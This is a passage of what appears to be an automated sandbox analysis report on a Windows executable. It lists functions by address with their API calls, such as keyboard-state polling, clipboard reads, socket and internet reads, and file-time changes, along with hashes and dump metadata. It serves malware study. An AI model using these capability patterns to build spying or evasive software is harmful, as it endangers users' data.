                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0046C726
                                                                                                                            • CloseClipboard.USER32 ref: 0046C866
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
                                                                                                                            • String ID: HH
                                                                                                                            • API String ID: 589737431-2761332787
                                                                                                                            • Opcode ID: 76419e0badb028214ed7bad9e924c36871e80023f9f647d131bfc03e45e064d3
                                                                                                                            • Instruction ID: 5556deb4c8197336e1b92b5e2a85e957832ef7964462d916cb468ff193882e13
                                                                                                                            • Opcode Fuzzy Hash: 76419e0badb028214ed7bad9e924c36871e80023f9f647d131bfc03e45e064d3
                                                                                                                            • Instruction Fuzzy Hash: 7301F5762042005FC300AFB9ED45B6A7BA4EF59704F04097FF980A72C1EBB1E915C7AA
                                                                                                                            Function 00436431 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __wcsicoll.LIBCMT ref: 0043643C
                                                                                                                            • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 00436452
                                                                                                                            • __wcsicoll.LIBCMT ref: 00436466
                                                                                                                            • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043647C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __wcsicollmouse_event
                                                                                                                            • String ID: DOWN
                                                                                                                            • API String ID: 1033544147-711622031
                                                                                                                            • Opcode ID: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
                                                                                                                            • Instruction ID: 8a73d33e481528181e274ae5662561dddcd8f7088196b39fde8242b6fe69d79f
                                                                                                                            • Opcode Fuzzy Hash: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
                                                                                                                            • Instruction Fuzzy Hash: 75E0927558872039FC4036253C02FFB174CAB66796F018116FE00D1291EA586D865BBD
                                                                                                                            Function 004741BB Relevance: 7.6, APIs: 5, Instructions: 137networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                                                                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 00474213
                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00474233
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastinet_addrsocket
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4170576061-0
                                                                                                                            • Opcode ID: c11ce247c64ee683b380b6a697379cd3ea863651eb179087c325b129d43524e0
                                                                                                                            • Instruction ID: 44a7e99483396e6262e636993c5e510db402c36a24f0b6146f21617b09e75fab
                                                                                                                            • Opcode Fuzzy Hash: c11ce247c64ee683b380b6a697379cd3ea863651eb179087c325b129d43524e0
                                                                                                                            • Instruction Fuzzy Hash: B6412C7164030067E720BB3A8C83F5A72D89F40728F144D5EF954BB2C3D6BAAD45475D
                                                                                                                            Function 00456354 Relevance: 7.6, APIs: 5, Instructions: 127keyboardCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetCursorPos.USER32(004A83D8), ref: 0045636A
                                                                                                                            • ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                                                                                                                            • GetAsyncKeyState.USER32(?), ref: 004563D0
                                                                                                                            • GetAsyncKeyState.USER32(?), ref: 004563DC
                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00456430
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3539004672-0
                                                                                                                            • Opcode ID: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                                                                                                                            • Instruction ID: 0eacbf52c9ff4b21db6d2500407d28a57be55752a0539e191fb639d8ee6a043b
                                                                                                                            • Opcode Fuzzy Hash: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                                                                                                                            • Instruction Fuzzy Hash: 8E416071108341ABD724DF55CD84EBBB7E9EF86725F540B0EB8A543281C734A848CB6A
                                                                                                                            Function 004772DE Relevance: 7.6, APIs: 5, Instructions: 67windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                                                            • IsWindowVisible.USER32 ref: 00477314
                                                                                                                            • IsWindowEnabled.USER32 ref: 00477324
                                                                                                                            • GetForegroundWindow.USER32(?,?,?,00000001,?,?), ref: 00477331
                                                                                                                            • IsIconic.USER32 ref: 0047733F
                                                                                                                            • IsZoomed.USER32 ref: 0047734D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 292994002-0
                                                                                                                            • Opcode ID: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                                                                                                                            • Instruction ID: c753cb395bd8887e5e04db90522a3107d7308fd2cfa588f53a4db7a4177bc043
                                                                                                                            • Opcode Fuzzy Hash: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                                                                                                                            • Instruction Fuzzy Hash: 351172327041119BE3209B26DD05B9FB7A8AF91310F05882EFC49E7250D7B8EC42D7A9
                                                                                                                            Function 00436D2D Relevance: 7.6, APIs: 5, Instructions: 52filetimeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,76233220,00000000,00000000,00442E95,?,?,?), ref: 00436D4F
                                                                                                                            • SetFileTime.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 00436D8C
                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 00436D93
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$CloseCreateHandleTime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3397143404-0
                                                                                                                            • Opcode ID: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                                                                                                                            • Instruction ID: bce1a9391340f9688fe0750810cd2cb1b104417d8b3c1e96578cdf6de8724fbd
                                                                                                                            • Opcode Fuzzy Hash: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                                                                                                                            • Instruction Fuzzy Hash: A4F0C83634132077E5301A69AC8DFCF276CABDAB32F20452EF741A61C083D51445977D
                                                                                                                            Function 0044EBBC Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 551COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _strncmp
                                                                                                                            • String ID: ACCEPT$^$h
                                                                                                                            • API String ID: 909875538-4263704089
                                                                                                                            • Opcode ID: adbbb77bd847cefbadd23aa8e42bde8f813033e7c46a43322acc698efb747d92
                                                                                                                            • Instruction ID: 72a2cba82410d8b1d90f72ff5cad5771b474d57714a55a9933f2c727144888ce
                                                                                                                            • Opcode Fuzzy Hash: adbbb77bd847cefbadd23aa8e42bde8f813033e7c46a43322acc698efb747d92
                                                                                                                            • Instruction Fuzzy Hash: AE22A0746083818FE725CF29C48076BBBE2BFC9304F24896EE8D587351D779984ACB56
                                                                                                                            Function 0040D7F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _set_new_mode.LIBCMT ref: 0040D88C
                                                                                                                            • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D8B9
                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 0040D8CE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeInfoLibraryParametersSystem_set_new_mode
                                                                                                                            • String ID: #v
                                                                                                                            • API String ID: 1188159508-554117064
                                                                                                                            • Opcode ID: 06ca62d5f0ac41005a4bed089aefec56480100fd5cca74c1e28fe2d3c932602c
                                                                                                                            • Instruction ID: 2b4412acdce639bfbf0f9e0c9ecf3f694f94d165ded01d265c3c64edb54a61d9
                                                                                                                            • Opcode Fuzzy Hash: 06ca62d5f0ac41005a4bed089aefec56480100fd5cca74c1e28fe2d3c932602c
                                                                                                                            • Instruction Fuzzy Hash: C2215EB19183009FC700EF56D88150ABBE4FB98354F44497EF849A72A2D735A945CB9A
                                                                                                                            Function 00446566 Relevance: 5.9, Strings: 4, Instructions: 868COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ERCP$VUUU$VUUU$VUUU
                                                                                                                            • API String ID: 0-2165971703
                                                                                                                            • Opcode ID: fe5f619ecbbb89e409f3ebcf557090f4afc22d0cdf4dbad8df8e547bb5c0b5b7
                                                                                                                            • Instruction ID: 514654dd073cfe12bfc68f6c44a091d7a3824994b709b832431b3f3de6bbd106
                                                                                                                            • Opcode Fuzzy Hash: fe5f619ecbbb89e409f3ebcf557090f4afc22d0cdf4dbad8df8e547bb5c0b5b7
                                                                                                                            • Instruction Fuzzy Hash: 5562D3716087818BE734CF18C8807ABB7E1EBC6314F154A2FE49986390E779D949CB5B
                                                                                                                            Function 0045C999 Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045C9BE
                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0045CA1B
                                                                                                                            • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CA4A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3541575487-0
                                                                                                                            • Opcode ID: 389ad529d810a64bb0ac3ba1ac38a0637fa5927c4fe4527bdd92752c01277f73
                                                                                                                            • Instruction ID: 18858b47483a38653cd59612877c1399ad483e9f26b014a4aa46912757e3bc7b
                                                                                                                            • Opcode Fuzzy Hash: 389ad529d810a64bb0ac3ba1ac38a0637fa5927c4fe4527bdd92752c01277f73
                                                                                                                            • Instruction Fuzzy Hash: EC41CE756003009FC720EF79D880A9BB3E4FF89315F208A6EED698B391D775A844CB95
                                                                                                                            Function 00436ADE Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetFileAttributesW.KERNEL32(00000001,00000000), ref: 00436AEF
                                                                                                                            • FindFirstFileW.KERNEL32(00000001,?), ref: 00436B00
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00436B13
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileFind$AttributesCloseFirst
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 48322524-0
                                                                                                                            • Opcode ID: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
                                                                                                                            • Instruction ID: 417b6d6de692ea6945bae3bf725251b28653fd5bce93257cef0f58e2a105c1b1
                                                                                                                            • Opcode Fuzzy Hash: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
                                                                                                                            • Instruction Fuzzy Hash: 23E02236804418678600AB7CAC0C4EE779CDB0A335F100B96FE38C21D0D775A9408FEA
                                                                                                                            Function 00443390 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __time64.LIBCMT ref: 004433A2
                                                                                                                              • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
                                                                                                                              • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                            • String ID: rJ
                                                                                                                            • API String ID: 2893107130-1865492326
                                                                                                                            • Opcode ID: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
                                                                                                                            • Instruction ID: ebc1a5536eae3429eadb0b33e849de59894c076497330b79c1ff8485d89898ec
                                                                                                                            • Opcode Fuzzy Hash: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
                                                                                                                            • Instruction Fuzzy Hash: B721A2336205108BF321CF36CC41652B7E7EBE0314F268A6AE4A5973C5CA797906CB98
                                                                                                                            Function 00443391 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __time64.LIBCMT ref: 004433A2
                                                                                                                              • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
                                                                                                                              • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                            • String ID: rJ
                                                                                                                            • API String ID: 2893107130-1865492326
                                                                                                                            • Opcode ID: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
                                                                                                                            • Instruction ID: 4b4e0c3debee0a45c2bc781276f994e79ac96c452fb6cf924f1e6ade5adf298d
                                                                                                                            • Opcode Fuzzy Hash: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
                                                                                                                            • Instruction Fuzzy Hash: E82187336345108BF321CF36CC4165277E3EBE0314B258B6AD4A5973C5CA797906CB88
                                                                                                                            Function 0044289D Relevance: 3.1, APIs: 2, Instructions: 82networkfileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • InternetQueryDataAvailable.WININET(?,?,?,?,00000000,00000000), ref: 004428C2
                                                                                                                            • InternetReadFile.WININET(?,00000000,?,?), ref: 004428F9
                                                                                                                              • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 901099227-0
                                                                                                                            • Opcode ID: 0771251b70b9bd68c35fac6f7da5b5f16004994504cb59d35d549d3fc14a9ba4
                                                                                                                            • Instruction ID: 2c15810e60b1cb59304632cc8162977c32d0240baa2dcf3c2cd6ef22f942a6bb
                                                                                                                            • Opcode Fuzzy Hash: 0771251b70b9bd68c35fac6f7da5b5f16004994504cb59d35d549d3fc14a9ba4
                                                                                                                            • Instruction Fuzzy Hash: 452174B12043016BF220EF56DD45FAFB3E8ABD4715F40492EF285A6180D7B8E949C76A
                                                                                                                            Function 0045DD7C Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045DDA1
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 0045DDDD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2295610775-0
                                                                                                                            • Opcode ID: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
                                                                                                                            • Instruction ID: 3577cc1601137e614a3334ffa73c6d258275d41fe8d72aaca367a27ef3e2a016
                                                                                                                            • Opcode Fuzzy Hash: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
                                                                                                                            • Instruction Fuzzy Hash: DE11E5766002049FD710EF6ADC89A5AF7E5EF84325F10892EF958D7281CB75E8048B94
                                                                                                                            Function 0047CBF0 Relevance: 2.9, Strings: 2, Instructions: 418COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
